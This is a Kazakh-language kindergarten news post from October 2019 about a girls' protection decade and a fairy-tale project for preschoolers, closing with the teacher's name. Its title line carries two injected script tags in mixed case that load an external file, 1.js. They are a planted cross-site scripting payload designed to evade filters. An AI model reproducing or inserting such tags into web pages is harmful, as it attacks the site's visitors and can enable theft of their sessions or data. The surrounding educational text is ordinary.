Қыздарға арналған онкүндігі.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
08.10.2019
Рухани жаңғыру бағдарламасының аясында 04-14 қазан арасында республикалвық декада өтті.Декаданың мақсаты:Халықаралық қыздарды қорғау,білім және де медициналық қызмет алу,зорлық-зомбылықтан қорғау. №4 «Қызғалдақ» тобында балаларға түсіндірме жұмыстары және де жоба жасалды.Мектепке дейінгі бала оқи білмесе де, үлкендердің оқып бергенін түсінетін тыңдаушы ретінде есептелінеді. Бірақ ол тыңдағысы келгенін ғана таңдайды, оны қабылдап,қызықты болғанын қалайды. Ертегі баланың ақыл ойын жетілдіреді, тілін дамытады. Балалардың ертегіге деген қызығушылығын арттыру үшін біз «Ертегі еліне» атты жоба ойластырылды. Осы жоба негізінде білім саласының бөлімінің міндеттері қарастырылды. Балалар ертегісі оны қоршаған ортаны танып білудегі бірінші және маңызды сатысы болып есептелінеді. Халық ертегілеріндегі көркем сөз кейіпкерлері мен тілі кішкентай балаға түсінікті де қарапайым. Ертегі баланың қиялын дамытады. Баланың қиялындағы жағдайларда өзін ойша іс әрекет жасауға дағдыландырады, ал мұндай сәт оның болашақ шығармашылығына жол береді.
Жобаның мақсаты:Баланың ертегіге қызығушылығы арқылы өнер туындысына деген көзқарасын дамыту; ұл балалардың қыздарды қорғау,сыйлау керек екенін, біріккен шығармашылық жұмыстар арқылы түсінік қалыптастыру.
Міндеті: Ұл балалардың қыздарға деген сый құрметін арттыру. Қыз балалардың ертегі туралы ойларын кеңейту. Жақсы көңіл күй, түсіну және қолдаушылық жағдайын туғызу, қиын жағдайда көмекке келуге әзір болу біліктілігін жетілдіру.
Ұл балалардың әрқашан қыз балалардың, халқымыздың ертеңге деген сенімі мен арман тілегін іске асырушы ретінде түсінік қалыптастыру.Ертегінің қай түрін алсақта ол баланың ой-қиялын ұштайды. Мінез-құлқын, ерік-жігерін, сөйлеу қабілетін, сөздік қорын қалыптастырады. Ертегіні оқытуда оның жанрлық ерекшелігін ескеріп, тәрбиелік мақсатына айырықша көңіл бөлгеніміз жөн. Б.Момышұлы «Ұшқан ұя» мемуарлық кітабында «Ертегісіз өскен бала-рухани мүгедек адам.Біздің қазіргі балаларымызға ертегіні ата-аналары айтып бермейді.Ал бесікте жатқанда құлағына анасының әлди үні сіңбеген баланың көкірегі кейін керең болып қалмаса деп қорқамын»-деген екен.Әсіресе, ертегінің мектеп жасына дейінгі балаға тигізер әсері мол.
Тәрбиешілер: Дарбаева Ф.К.

